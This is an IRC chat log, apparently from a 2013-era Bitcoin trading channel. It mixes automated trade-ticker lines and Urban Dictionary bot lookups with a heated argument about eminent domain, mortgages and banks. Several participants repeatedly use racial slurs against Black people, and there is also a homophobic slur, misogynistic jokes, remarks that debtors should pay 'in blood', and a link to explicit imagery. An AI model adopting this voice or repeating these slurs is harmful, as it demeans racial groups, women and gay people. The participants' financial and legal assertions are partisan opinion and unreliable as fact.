instead of the commonly used lol that is way overused the irllol is for the seriousl... Aug 26 00:04:15 Urban Dictionary: irllol Aug 26 00:04:16 it has fag at any rate Aug 26 00:04:18 hahaha Aug 26 00:04:39 [MPEX] [S.MPOE] 5900 @ 0.00085349 = 5.0356 BTC [-] Aug 26 00:04:48 ;;ud thaumaturgy Aug 26 00:04:49 http://www.urbandictionary.com/define.php?term=thaumaturgy | trending. swag · ratchet · white lobster · smh · queen for a day · hashtag · rule 34 · hipster · philadelphia snowplow · twerk. categories. gaming · sports · food · sex ... Aug 26 00:04:51 Urban Dictionary: thaumaturgy Aug 26 00:05:01 oh, gotcha Aug 26 00:05:25 i guess real words aren't urban enough to be included Aug 26 00:05:28 ;;ud inaba Aug 26 00:05:28 http://www.urbandictionary.com/define.php?term=inaba | "inaba" someone who doesn't have a clue about what s/he is talking about, coming from 'inable', 'inability' use their brains before doing something... Aug 26 00:05:29 nubbins` magicworking Aug 26 00:05:33 Urban Dictionary: inaba Aug 26 00:05:38 i put that there. Aug 26 00:05:45 ;;ud luke-jr Aug 26 00:05:46 http://www.urbandictionary.com/author.php?author=BB%2C+AP%2C+AB%2C+JR%2C+NK%2C+BP | US: Oh boy, do we love my LUKE THE MACHINE or what? Others: Wait...does he have a keg ... by BB, AP, AB, JR, NK, BP Jun 19, 2006 add a video · 2. danbaid. Aug 26 00:05:46 kakobrekla you did the world a serviced. Aug 26 00:05:47 Urban Dictionary: Author BB, AP, AB, JR, NK, BP Aug 26 00:05:56 [MPEX] [S.MPOE] 12773 @ 0.00085456 = 10.9153 BTC [+] Aug 26 00:06:01 [MPEX] [S.MPOE] 11400 @ 0.00085537 = 9.7512 BTC [+] Aug 26 00:06:03 [MPEX] [S.MPOE] 2550 @ 0.00085577 = 2.1822 BTC [+] Aug 26 00:06:04 [MPEX] [S.MPOE] 10127 @ 0.00085645 = 8.6733 BTC [+] Aug 26 00:06:05 mhm Aug 26 00:06:08 is what i do Aug 26 00:06:29 ;;ud santorum Aug 26 00:06:29 http://www.urbandictionary.com/define.php?term=Santorum%20Super%20Tuesday%20Surprise | 1. (noun) An anal sex act, in which the giving partner lies to the receiving partner and tells him or her that he has ejaculated. After the receivi... Aug 26 00:06:30 ;;ud dick surgery Aug 26 00:06:31 http://www.urbandictionary.com/define.php?term=addadicktome | This is a sex change operation when a female becomes a male and has their sexual privates reshaped into a dick, thereby adding a dick to me. Yo, is Taquisha ... Aug 26 00:06:35 Urban Dictionary: Santorum Super Tuesday Surprise Aug 26 00:06:38 Urban Dictionary: addadicktome Aug 26 00:07:44 ;;ud goxed Aug 26 00:07:45 http://www.urbandictionary.com/define.php?term=goxed | Being effectively fooled and/or trolled repeatedly. Derived from the "temporary" closure of the Bitcoin exchange site MtGox in June 2011, and the r... Aug 26 00:07:47 Urban Dictionary: goxed Aug 26 00:07:49 :) Aug 26 00:08:07 YES Aug 26 00:08:10 [BTCTC] [DMS.MINING] 10 @ 0.003629 = 0.0363 BTC [-] Aug 26 00:08:13 ;;ud thick as thieves Aug 26 00:08:13 http://www.urbandictionary.com/define.php?term=thick%20as%20thieves | A special bond people have for each other. Derived from the idea of "partners in crime". Aug 26 00:08:15 Urban Dictionary: thick as thieves Aug 26 00:08:23 :D Aug 26 00:08:33 ThickAsThieves is tigheter than the tightest niggaz Aug 26 00:08:39 In ThickAsThieves we trust Aug 26 00:08:40 waitaminute Aug 26 00:08:46 ;;ud dick surgery Aug 26 00:08:46 http://www.urbandictionary.com/define.php?term=addadicktome | This is a sex change operation when a female becomes a male and has their sexual privates reshaped into a dick, thereby adding a dick to me. Yo, is Taquisha ... Aug 26 00:08:48 Urban Dictionary: addadicktome Aug 26 00:08:53 sexual privates!!! Aug 26 00:15:57 [BTCTC] [ASICMINER-PT] 1 @ 2.828 BTC [+] Aug 26 00:17:41 [BTCTC] [DMS.PURCHASE] 27 @ 0.01606 = 0.4336 BTC [+] Aug 26 00:19:34 that's a cup. then there's sexual corporals... Aug 26 00:20:14 [BTCTC] [DMS.SELLING] 30 @ 0.01297 = 0.3891 BTC [-] Aug 26 00:20:15 [BTCTC] [DMS.SELLING] 55 @ 0.01297 = 0.7134 BTC [-] Aug 26 00:20:17 [BTCTC] [DMS.SELLING] 275 @ 0.01298 = 3.5695 BTC [+] Aug 26 00:20:18 [BTCTC] [DMS.SELLING] 258 @ 0.01299 = 3.3514 BTC [+] Aug 26 00:20:19 [BTCTC] [DMS.SELLING] 4 @ 0.013 = 0.052 BTC [+] Aug 26 00:21:29 [BTCTC] [DMS.PURCHASE] 275 @ 0.01606 = 4.4165 BTC [+] Aug 26 00:21:36 that's a cane Aug 26 00:23:54 A cup. Aug 26 00:26:22 [BTCTC] [DMS.MINING] 20 @ 0.003401 = 0.068 BTC [-] Aug 26 00:26:23 [BTCTC] [DMS.MINING] 50 @ 0.0034 = 0.17 BTC [-] Aug 26 00:26:24 [BTCTC] [DMS.MINING] 130 @ 0.003314 = 0.4308 BTC [-] Aug 26 00:26:49 [BTCTC] [NASTY-PT] 1 @ 0.002279 BTC [-] Aug 26 00:27:59 no, the cane was for the corporal Aug 26 00:28:22 [BTCTC] [DMS.SELLING] 100 @ 0.01252 = 1.252 BTC [-] Aug 26 00:28:23 [BTCTC] [DMS.SELLING] 2 @ 0.01251 = 0.025 BTC [-] Aug 26 00:28:25 [BTCTC] [DMS.SELLING] 83 @ 0.0125 = 1.0375 BTC [-] Aug 26 00:28:26 [BTCTC] [DMS.SELLING] 35 @ 0.01243 = 0.4351 BTC [-] Aug 26 00:29:49 [HAVELOCK] [AM100] 10 @ 0.027 = 0.27 BTC [-] Aug 26 00:34:32 [HAVELOCK] [XBOND] 3 @ 0.00117 = 0.0035 BTC [+] Aug 26 00:37:07 [BTCTC] [LABCOIN] 820 @ 0.003425 = 2.8085 BTC [-] Aug 26 00:38:28 [BTCTC] [RSM] 2 @ 0.0136 = 0.0272 BTC [+] Aug 26 00:39:31 [BTCTC] [BMF] 1 @ 0.03399 BTC [+] Aug 26 00:39:32 [BTCTC] [BMF] 1 @ 0.04 BTC [+] Aug 26 00:39:49 [HAVELOCK] [AM100] 3 @ 0.027 = 0.081 BTC [-] Aug 26 00:40:25 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Aug 26 00:41:52 [BTCTC] [DMS.MINING] 49 @ 0.003314 = 0.1624 BTC [-] Aug 26 00:41:53 [BTCTC] [DMS.MINING] 26 @ 0.003313 = 0.0861 BTC [-] Aug 26 00:42:37 [HAVELOCK] [XBOND] 70 @ 0.00117 = 0.0819 BTC [+] Aug 26 00:44:13 [BTCTC] [TAT.ASICMINER] 67 @ 0.02881 = 1.9303 BTC [+] Aug 26 00:45:27 [BTCTC] [TAT.ASICMINER] 40 @ 0.02881 = 1.1524 BTC [+] Aug 26 00:45:57 [MPEX] [S.MPOE] 1273 @ 0.00085349 = 1.0865 BTC [-] Aug 26 00:45:59 [MPEX] [S.MPOE] 15932 @ 0.00085342 = 13.5967 BTC [-] Aug 26 00:48:48 [BTCTC] [LABCOIN] 20 @ 0.0034 = 0.068 BTC [-] Aug 26 00:49:15 [BTCTC] [LABCOIN] 380 @ 0.0034 = 1.292 BTC [-] Aug 26 01:02:17 [BTCTC] [ASICMINER-PT] 1 @ 2.827 BTC [-] Aug 26 01:02:19 [BTCTC] [ASICMINER-PT] 1 @ 2.825 BTC [-] Aug 26 01:02:19 [BTCTC] [ASICMINER-PT] 1 @ 2.822 BTC [-] Aug 26 01:02:20 [BTCTC] [ASICMINER-PT] 1 @ 2.821 BTC [-] Aug 26 01:02:54 [BTCTC] [LABCOIN] 2 @ 0.003422 = 0.0068 BTC [+] Aug 26 01:04:43 [BTCTC] [LABCOIN] 498 @ 0.003422 = 1.7042 BTC [+] Aug 26 01:10:42 [HAVELOCK] [AM100] 2 @ 0.0283 = 0.0566 BTC [+] Aug 26 01:11:40 [BTCTC] [LABCOIN] 20 @ 0.003304 = 0.0661 BTC [-] Aug 26 01:11:41 [BTCTC] [LABCOIN] 80 @ 0.003303 = 0.2642 BTC [-] Aug 26 01:13:48 [BTCTC] [BASIC-MINING] 10 @ 0.22 = 2.2 BTC [-] Aug 26 01:14:02 [HAVELOCK] [CFIG] 3 @ 0.148999 = 0.447 BTC [+] Aug 26 01:14:04 [MPEX] [S.MPOE] 6450 @ 0.00085645 = 5.5241 BTC [+] Aug 26 01:14:27 http://www.startribune.com/business/yourmoney/220998141.html Aug 26 01:14:31 Desperate Calif. city looks to use 'eminent domain' to seize loans to ease homeowners burden | Star Aug 26 01:14:40 lmao Aug 26 01:14:56 they can't "seize" loans, they have to pay for it. Aug 26 01:16:20 mircea_popescu: actually, they might be able to Aug 26 01:16:34 eminent domain is not a way to steal money. Aug 26 01:16:41 the loan IS property, and ANY kind of property can be seized through eminent domain Aug 26 01:16:45 if you use it to take $1mn worth of property you have to pay me $1mn in cahs. Aug 26 01:16:49 if they had the cash to pay thery Aug 26 01:16:52 mircea_popescu: but thats the thing, no money has been stolen Aug 26 01:16:57 wouldn't need to use eminent domain, banks'd just give it Aug 26 01:17:07 in fact, the banks cannot even prove the money "loaned" ever existed Aug 26 01:17:36 oh get out with the fringe interpretations. if the issue is that the money "never existed" then they're free to press that in court. Aug 26 01:17:54 someone's gonna argue that the usg never existed and that'd be that. Aug 26 01:18:23 mircea_popescu: anyhow Aug 26 01:18:24 you're missing the point Aug 26 01:18:29 its the government fighting the banks Aug 26 01:18:37 everyone should be happy this is going on Aug 26 01:18:37 nope. it's the government fighting the rule of law. Aug 26 01:18:45 nobody sane should be happy this is going on. Aug 26 01:18:46 there is no rule of law Aug 26 01:18:49 merely rule of money Aug 26 01:18:52 that's no excuse. Aug 26 01:18:58 [HAVELOCK] [XBOND] 500 @ 0.00117 = 0.585 BTC [+] Aug 26 01:19:08 and the american people are now saying we must have a rule of law and EVERYONE must be under it Aug 26 01:19:13 not merely the poor slaves, but the rich as well Aug 26 01:19:15 Richmond, working with San Francisco-based Mortgage Resolution Partners, offers $150,000 to buy a $300,000 bank loan on a house that is now worth $200,000 and is in danger of foreclosure. Aug 26 01:19:15 If the bank agrees, the city and the company then obtain the loan at $150,000. Richmond and the company then offer the homeowner a new loan of $190,000, which, if accepted, lowers the monthly payments and improves the owners' chances of staying. Aug 26 01:19:16 [HAVELOCK] [AM100] 2 @ 0.0283 = 0.0566 BTC [+] Aug 26 01:19:32 basically the city wants to give some other people's money to some douches they're friends with Aug 26 01:19:36 this is the definition of graft. Aug 26 01:19:58 interpret it how you want Aug 26 01:20:05 I think private mortgages should be made illegal anyhow Aug 26 01:20:19 and all existing private mortgages burned Aug 26 01:20:28 you basically think anything should be made illegal by how the wind blows. Aug 26 01:20:38 [BTCTC] [ACTIVEMINING] 4 @ 0.005413 = 0.0217 BTC [+] Aug 26 01:20:57 I think if someone abuses a privilege, that privilege should be taken away from them Aug 26 01:21:05 there is no "priviledgE" Aug 26 01:21:12 and nobody is in anuy position to "take away" anything. Aug 26 01:21:20 it's just a loan, dd3 Aug 26 01:21:20 we're discussing rights, whioch are above anyone, especially above you. Aug 26 01:21:36 Diablo-D3: plan to outlaw all securitized loans now? Aug 26 01:21:45 benkay: no, just ones with private citizens Aug 26 01:21:53 what companies do with other companies, well, thats their business Aug 26 01:21:56 so basically declare anyone in the us a nigger. Aug 26 01:22:02 [HAVELOCK] [AM100] 15 @ 0.028 = 0.42 BTC [-] Aug 26 01:22:08 seeing how the major distinguishing feature of the 1900s nigger was his inability to take on a loan. Aug 26 01:22:14 Diablo-D3: so you want me to be unable to leverage my assets. Aug 26 01:22:16 (on the grounds of being legally mentally inept) Aug 26 01:22:16 mircea_popescu: until financial degrees are required education in school Aug 26 01:22:21 mircea_popescu: it should be illegal. Aug 26 01:22:40 make idiocy illegal while at it. Aug 26 01:22:57 hes suggesting we make niggerdom mandatory Aug 26 01:22:58 and ugly women Aug 26 01:23:13 that city is a rats nest of idiot property speculators who are using the local gov't to escape from the terms of their debts Aug 26 01:23:21 i wonder how the us political landscape would look if ugly women were illegal. Aug 26 01:23:25 [BTCTC] [ASICMINER-PT] 1 @ 2.823 BTC [+] Aug 26 01:23:26 [BTCTC] [ASICMINER-PT] 1 @ 2.822 BTC [-] Aug 26 01:23:27 [BTCTC] [ASICMINER-PT] 2 @ 2.821 = 5.642 BTC [-] Aug 26 01:23:28 [BTCTC] [ASICMINER-PT] 1 @ 2.81 BTC [-] Aug 26 01:23:29 [BTCTC] [ASICMINER-PT] 1 @ 2.81 BTC [-] Aug 26 01:23:31 [BTCTC] [ASICMINER-PT] 2 @ 2.8 = 5.6 BTC [-] Aug 26 01:23:32 [BTCTC] [ASICMINER-PT] 1 @ 2.79 BTC [-] Aug 26 01:23:33 [BTCTC] [ASICMINER-PT] 1 @ 2.78 BTC [-] Aug 26 01:23:34 mircea_popescu: slightly better Aug 26 01:23:41 dub name a hot us politician woman. Aug 26 01:23:54 [06:22:41] make idiocy illegal while at it. Aug 26 01:23:54 [06:22:58] hes suggesting we make niggerdom mandatory Aug 26 01:23:59 benkay or trying to at anuy rate. Aug 26 01:24:03 Im suggesting we make full and complete educations mandatory Aug 26 01:24:14 Diablo-D3: you can't educate most people. Aug 26 01:24:18 they're tghe same schmucks that were swarming reddit five years ago ranting about how rich they are being made by their speculative wisdom Aug 26 01:24:20 benkay: then most people simply cant get loans. Aug 26 01:24:22 and how much of a sucker everyone else is. Aug 26 01:24:34 Diablo-D3: why not let lenders default? Aug 26 01:24:36 mircea_popescu: yes, and 5 years ago I was telling them to stop inflating the housing market Aug 26 01:24:47 benkay: because the lenders refuse to default. Aug 26 01:24:53 If they couldn't afford it they should have just not bought the damn fucking house. When you take a decision, deal with the consequences. Aug 26 01:25:06 Diablo-D3: naw, they just have a lock on the government operators. Aug 26 01:25:08 benkay: they just steal money from everyone else using congress Aug 26 01:25:15 the whole "bailout" Aug 26 01:25:26 [BTCTC] [DMS.MINING] 2 @ 0.003424 = 0.0068 BTC [+] Aug 26 01:25:29 I do not do business with those banks, nor do I have any loans, so why am _I_ paying for their mistakes Aug 26 01:25:32 Namworld: it would help to reduce easy access to shitty finance Aug 26 01:25:39 basically the entire us is this rat nest of speculators trying to steal shit from each other. Aug 26 01:25:39 Diablo-D3: your solution obviously is to make private securitized debts illegal. Aug 26 01:25:40 [BTCTC] [TAT.ASICMINER] 12 @ 0.02817 = 0.338 BTC [-] Aug 26 01:25:41 [BTCTC] [TAT.ASICMINER] 13 @ 0.02815 = 0.366 BTC [-] Aug 26 01:25:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02804 = 0.0561 BTC [-] Aug 26 01:25:43 [BTCTC] [TAT.ASICMINER] 12 @ 0.02803 = 0.3364 BTC [-] Aug 26 01:25:43 [BTCTC] [LABCOIN] 20 @ 0.003422 = 0.0684 BTC [+] Aug 26 01:25:44 worst. Aug 26 01:25:46 [BTCTC] [TAT.ASICMINER] 50 @ 0.02803 = 1.4015 BTC [-] Aug 26 01:25:48 [06:24:54] If they couldn't afford it they should have just not bought the damn fucking house. When you take a decision, deal with the consequences. Aug 26 01:25:50 Namworld: thats not the problem Aug 26 01:26:00 if your house goes down in value, the bank DEMANDS you pay the difference NOW Aug 26 01:26:14 instead of on the schedule you agreed to when you signed the loan Aug 26 01:26:15 wat? Aug 26 01:26:22 this sounds a little fantastic. Aug 26 01:26:22 They do that? What the heck for? Aug 26 01:26:31 i never heard of it... Aug 26 01:26:31 Namworld: because they're evil corrupt assholes Aug 26 01:26:35 Is there a clause in the contract about that? Aug 26 01:26:39 Namworld: yes Aug 26 01:26:55 Well then the buyer's fault. Read contracts in full. Aug 26 01:26:57 but most people dont know how to read contracts because the government refuses to make the education for such manditory Aug 26 01:26:58 typically, yes, Namworld. Aug 26 01:27:15 legalese isn't english, and you should never mistake it for such Aug 26 01:27:22 right. the reason people aren't educating themselves is because the govt isn't making it mandatory. Aug 26 01:27:31 it's a wonder they get laid, seeing how that's not mandatory either. Aug 26 01:27:34 Diablo-D3: ignoring the fact that most people will never be able to understand these obligations. Aug 26 01:27:36 is this not what lawyers are for? Aug 26 01:27:54 dub: yes, but if you need a lawyer just to buy a house, the system has failed Aug 26 01:28:15 um Aug 26 01:28:17 and if you need a dentist just to fix your teeth the system has also failed ? Aug 26 01:28:19 Diablo-D3: naw. let property ownership fall back to those with the capital to pay for lawyers, man. Aug 26 01:28:21 what in the love of fuck. Aug 26 01:28:21 its not HARD to educate people in legal basics, it'd be 3 or 4 year long classes during their high school year Aug 26 01:28:25 er, high school education Aug 26 01:28:40 Diablo-D3 how come they have sex, while sex isn't mandatory ? Aug 26 01:28:42 benkay: then the entire US economy crashes because now we have a bunch of houses no one can live in Aug 26 01:28:50 mircea_popescu: because sex is built into our genetics Aug 26 01:28:51 Diablo-D3: we don't already? Aug 26 01:28:53 in dubistan you CANT transfer property title without a lawyer, they do the transfery bits Aug 26 01:28:54 mircea_popescu: lying isnt. Aug 26 01:28:55 and thinking isn't ? Aug 26 01:28:58 Contracts with consumers aren't chinese either. They're just long and boring. Since when are contracts gibberish? You can still understand what the contract says. Aug 26 01:29:09 and legalese is all about lying, cheating, and stealing. Aug 26 01:29:18 i think Diablo-D3 should be illegal. Aug 26 01:29:22 Diablo-D3: this isn't already a nation of idiots who've taken on too much debt without the revenues to make payments? Aug 26 01:29:26 Diablo-D3: news to me. Aug 26 01:29:35 while you're there you have them asses any contracts as well as the title and assoc documents Aug 26 01:29:43 Namworld: I dunno, Ive read through contracts that Ive had to double check with law dictionaries and case law just to make usre it said what I thought it said Aug 26 01:29:57 [BTCTC] [ASICMINER-PT] 1 @ 2.752 BTC [-] Aug 26 01:29:59 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [-] Aug 26 01:30:00 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [-] Aug 26 01:30:01 [BTCTC] [ASICMINER-PT] 1 @ 2.702 BTC [-] Aug 26 01:30:02 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 26 01:30:04 [BTCTC] [ASICMINER-PT] 1 @ 2.662 BTC [-] Aug 26 01:30:05 [BTCTC] [ASICMINER-PT] 3 @ 2.661 = 7.983 BTC [-] Aug 26 01:30:05 [BTCTC] [ASICMINER-PT] 1 @ 2.654 BTC [-] Aug 26 01:30:06 [BTCTC] [ASICMINER-PT] 3 @ 2.653 = 7.959 BTC [-] Aug 26 01:30:07 benkay: idiots yes, but I think the banks are the ones that are the idiots Aug 26 01:30:07 [BTCTC] [ASICMINER-PT] 2 @ 2.652 = 5.304 BTC [-] Aug 26 01:30:09 Hmm, maybe contracts are more obscure in the US Aug 26 01:30:14 they loaned money to people and now the money is gone forever Aug 26 01:30:19 They seem pretty straightforward here Aug 26 01:30:26 even if they get the house back, the house is worthless Aug 26 01:30:27 much like all the money asicminer ppl thought they had. Aug 26 01:30:43 Diablo-D3: except that money is now securely in the hands of far smarter humans. Aug 26 01:30:44 bubbles are bad mkay. Aug 26 01:30:47 its worth FAR less than what the loan was for (mainly because major banks conspired to jack up the housing market) and now they cant sell it to anyone Aug 26 01:30:57 the problem with the US is the banks have no incentive to lend to people capable of servicing the loans Aug 26 01:30:59 benkay: not really, it evaporated over night Aug 26 01:30:59 dude! nobody forced all the idiots to sign the forms. Aug 26 01:31:00 wtf. Aug 26 01:31:01 Diablo-D3: and the bank operators are vastly more wealthy than they were before. Aug 26 01:31:02 the money no longer exists Aug 26 01:31:17 mircea_popescu: yes, but they signed forms that said one thing but meant another Aug 26 01:31:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0274 BTC [-] Aug 26 01:31:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.0274 = 1.37 BTC [-] Aug 26 01:31:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0273 BTC [-] Aug 26 01:31:21 [BTCTC] [TAT.ASICMINER] 31 @ 0.02722 = 0.8438 BTC [-] Aug 26 01:31:21 who told joe blow to sign on the dotted line for a 5mn house ? Aug 26 01:31:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.02721 BTC [-] Aug 26 01:31:23 [BTCTC] [TAT.ASICMINER] 155 @ 0.0272 = 4.216 BTC [-] Aug 26 01:31:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.02714 = 0.0814 BTC [-] Aug 26 01:31:29 mircea_popescu: do you realized how many banks outright lied about how houses are purchased and mortgaged? Aug 26 01:31:30 what's wrong with begging me to let him live in my garage ? Aug 26 01:31:32 mircea_popescu: everyone is going it! Aug 26 01:31:41 Diablo-D3 i don't givbe a shit. Aug 26 01:31:44 mircea_popescu: they would tell people to write in false numbers off a table because "thats how the bank works" Aug 26 01:31:49 fraud is fraud, mircea_popescu Aug 26 01:31:50 period Aug 26 01:31:56 all the americans that shjould have been poor and humble do not get to excuse their grandstanding behaviour now. Aug 26 01:32:07 wow, mircea_popescu is just a troll Aug 26 01:32:09 okay Aug 26 01:32:10 let them pay for it, in blood preferably. Aug 26 01:32:12 problem solved Aug 26 01:32:14 the fraud is govt bailing out banks who lend to niggers Aug 26 01:32:28 no, the law should be, if you have a mortgage you can't cover it's one pound of flesh per 1k dollars. Aug 26 01:32:29 dub: no, thats just covering up the fraud with an even bigger fraud Aug 26 01:32:31 payable outright. Aug 26 01:32:45 forward march to the organ banks, the chinese have a transplant problem. Aug 26 01:32:50 it's just power dynamcs - why are y'all getting hot under the collar? Aug 26 01:32:55 people with power fuck those without Aug 26 01:32:58 end of story Aug 26 01:33:06 benkay because i don't like the pretense of the powerless. Aug 26 01:33:17 benkay: yes, and its illegal, by law (the highest power of the land) to use said power Aug 26 01:33:35 herp. Aug 26 01:33:37 Diablo-D3: the highest power in the land is the government, which is fucking the idiots. Aug 26 01:33:45 Diablo-D3: at the bankers behest. Aug 26 01:33:46 so until the rich decide to play by the same rules as everyone else, they should be severely limited in the economy Aug 26 01:33:52 "should" Aug 26 01:33:53 gtfo. Aug 26 01:33:55 these liberals Aug 26 01:34:19 benkay: having money is a privilege, not a right. Aug 26 01:34:20 dude i really wish we have a two week level field, so we just see exactly what happens Aug 26 01:34:30 ok that's the end of that. Aug 26 01:34:35 Diablo-D3!*@* added to ignore list. Aug 26 01:34:36 Diablo-D3: power is acquired by force. that is the only rule. Aug 26 01:34:50 probably should have ignored the guy much earlier, in retrospect. Aug 26 01:34:52 [BTCTC] [LABCOIN] 500 @ 0.003423 = 1.7115 BTC [+] Aug 26 01:35:22 mp, about to hit yourself in the head witha hammer? Aug 26 01:35:38 jborkl i draw the line at "property is a priviledge" Aug 26 01:35:49 lol yeah Aug 26 01:36:04 past that, the subhuman scum has absolutely nothing to say that might redeem it. Aug 26 01:37:10 [BTCTC] [LABCOIN] 200 @ 0.003423 = 0.6846 BTC [+] Aug 26 01:39:09 Why would he be arguing against protecting property buyers/helping them then? Aug 26 01:39:59 [BTCTC] [LABCOIN] 300 @ 0.003423 = 1.0269 BTC [+] Aug 26 01:39:59 [BTCTC] [LABCOIN] 200 @ 0.003423 = 0.6846 BTC [+] Aug 26 01:40:48 [BTCTC] [LABCOIN] 500 @ 0.003423 = 1.7115 BTC [+] Aug 26 01:40:49 [BTCTC] [LABCOIN] 621 @ 0.003425 = 2.1269 BTC [+] Aug 26 01:41:28 [BTCTC] [LABCOIN] 500 @ 0.003425 = 1.7125 BTC [+] Aug 26 01:43:06 [BTCTC] [LABCOIN] 500 @ 0.003425 = 1.7125 BTC [+] Aug 26 01:43:47 [BTCTC] [LABCOIN] 1500 @ 0.003425 = 5.1375 BTC [+] Aug 26 01:45:19 Selling 0.1 BTC (paypal accepted) Aug 26 01:45:40 danthick_: whatilearnedtoday.jameslarisch.com/?action=view&url=bitcoin-ebay-profit Aug 26 01:45:51 that was fast Aug 26 01:45:57 [HAVELOCK] [XBOND] 1 @ 0.00117 BTC [+] Aug 26 01:45:58 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 26 01:46:02 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 26 01:46:09 as usual you have it ass backwards, you want to educate niggers about taking impossbiel positions instead of removing the incentive fo banks to offer impossible positions Aug 26 01:46:10 benkay dude hasn't published my comment. Aug 26 01:46:17 mircea_popescu: so i note Aug 26 01:46:26 well not nice of him! Aug 26 01:46:37 what about it Anduck ? Aug 26 01:46:43 go Aug 26 01:46:43 and Aug 26 01:46:45 bet!!! Aug 26 01:46:47 lol Aug 26 01:46:53 i bet at it and i think i will win Aug 26 01:47:03 unlike everyone else right ? Aug 26 01:47:15 well everyone who bets my side will win too Aug 26 01:47:25 [BTCTC] [LABCOIN] 1 @ 0.00348 BTC [+] Aug 26 01:47:36 mircea_popescu: "Was I scammed? Were their accounts really hacked? Who knows. I'll stick to programming." Aug 26 01:48:11 mircea_popescu: wouldn't expect him to bend over for a reaming in public from someone who's been on record for years screaming about the ease of scamming noobs in the coinspace Aug 26 01:48:56 i would. it's the halmark of the superior intellect. Aug 26 01:49:02 in other news, did i mention i like taki ? http://www.spectator.co.uk/life/high-life/6525763/high-life-11/ Aug 26 01:50:28 [HAVELOCK] [AM100] 2 @ 0.028 = 0.056 BTC [-] Aug 26 01:50:51 [HAVELOCK] [AM100] 1 @ 0.028 BTC [-] Aug 26 01:51:24 ‘men take care of material things, women take care of the soul’ Aug 26 01:51:27 bawww Aug 26 01:51:38 hey baby my soul needs much caring for Aug 26 01:51:59 i'm an unrepentant capitalist looking to squeeze every penny i can from the worlds idiots Aug 26 01:52:04 come and fix me Aug 26 01:52:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.02912 BTC [+] Aug 26 01:52:43 mircea_popescu: i prefer my canings in private Aug 26 01:52:58 bitstamp 24h volume is higher than goxUSD Aug 26 01:53:03 canings what ?! Aug 26 01:53:19 qxzn probasbly the last suckers managed to finally get out of gox trap Aug 26 01:53:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02912 BTC [+] Aug 26 01:53:31 [BTCTC] [ACTIVEMINING] 28 @ 0.005423 = 0.1518 BTC [+] Aug 26 01:53:35 and substitute bitstamp trap :) Aug 26 01:53:48 (punishments for making mistakes mircea_popescu) Aug 26 01:54:00 [BTCTC] [TAT.ASICMINER] 6 @ 0.02768 = 0.1661 BTC [-] Aug 26 01:54:03 [BTCTC] [TAT.ASICMINER] 61 @ 0.02769 = 1.6891 BTC [+] Aug 26 01:54:19 o. sure. Aug 26 01:54:30 qxzn i have no idea about bistamp, but iirc kakobrekla doesn't like them Aug 26 01:54:32 [BTCTC] [LABCOIN] 2 @ 0.003435 = 0.0069 BTC [-] Aug 26 01:54:35 mircea_popescu: what difference an a can make Aug 26 01:54:47 mebbe he's on to something Aug 26 01:55:19 [BTCTC] [TAT.ASICMINER] 67 @ 0.02866 = 1.9202 BTC [+] Aug 26 01:56:54 [BTCTC] [TAT.ASICMINER] 67 @ 0.02769 = 1.8552 BTC [-] Aug 26 01:57:29 [BTCTC] [TAT.ASICMINER] 67 @ 0.02866 = 1.9202 BTC [+] Aug 26 01:58:04 [BTCTC] [TAT.ASICMINER] 67 @ 0.02769 = 1.8552 BTC [-] Aug 26 01:58:38 [BTCTC] [TAT.ASICMINER] 67 @ 0.02866 = 1.9202 BTC [+] Aug 26 01:58:46 its true that slovenians are more harsh among eachother than to others, but i would ufckin hate them even if they were french Aug 26 01:59:14 surely everyone hates the frenc Aug 26 01:59:27 I mean, whats to like? Aug 26 01:59:33 [BTCTC] [TAT.ASICMINER] 67 @ 0.02769 = 1.8552 BTC [-] Aug 26 01:59:47 [BTCTC] [TAT.ASICMINER] 67 @ 0.02861 = 1.9169 BTC [+] Aug 26 01:59:59 Selling 0.1 BTC (paypal accepted) Aug 26 02:00:17 dub i like plenty of french ppls. Aug 26 02:00:22 [BTCTC] [TAT.ASICMINER] 67 @ 0.02769 = 1.8552 BTC [-] Aug 26 02:00:38 i just used french as an example. Aug 26 02:01:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Aug 26 02:01:02 [HAVELOCK] [LABCO] 5 @ 0.00344 = 0.0172 BTC [+] Aug 26 02:01:05 [HAVELOCK] [LABCO] 6 @ 0.00344 = 0.0206 BTC [+] Aug 26 02:01:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [+] Aug 26 02:02:46 dub http://img.barelist.com/images/blog/122711-angell-summers-french-naked-striptease-brunette-perfect-tits.jpg no go ? Aug 26 02:03:06 [BTCTC] [ASICMINER-PT] 1 @ 2.878 BTC [+] Aug 26 02:03:07 [BTCTC] [ASICMINER-PT] 1 @ 2.881 BTC [+] Aug 26 02:03:09 [BTCTC] [ASICMINER-PT] 3 @ 2.882 = 8.646 BTC [+] Aug 26 02:03:10 [BTCTC] [ASICMINER-PT] 1 @ 2.897 BTC [+] Aug 26 02:03:11 [BTCTC] [ASICMINER-PT] 1 @ 2.897 BTC [+] Aug 26 02:03:23 [BTCTC] [DMS.PURCHASE] 144 @ 0.01606 = 2.3126 BTC [+] Aug 26 02:04:14 so it can put down its garlic baguette and shave for a couple fo photos Aug 26 02:04:20 big deal Aug 26 02:04:26 [BTCTC] [ACTIVEMINING] 17 @ 0.005414 = 0.092 BTC [-] Aug 26 02:04:26 [BTCTC] [ACTIVEMINING] 68 @ 0.005415 = 0.3682 BTC [+] Aug 26 02:04:27 [BTCTC] [ACTIVEMINING] 41 @ 0.005428 = 0.2225 BTC [+] Aug 26 02:04:28 [BTCTC] [ACTIVEMINING] 22 @ 0.005429 = 0.1194 BTC [+] Aug 26 02:05:01 [HAVELOCK] [AM100] 2 @ 0.027 = 0.054 BTC [-] Aug 26 02:05:16 ".... If you have a book about bitcoins and the way to work with, I kindly ask you for a copy." Aug 26 02:05:19 huh. Aug 26 02:05:36 a book. Aug 26 02:06:12 could be a marekt 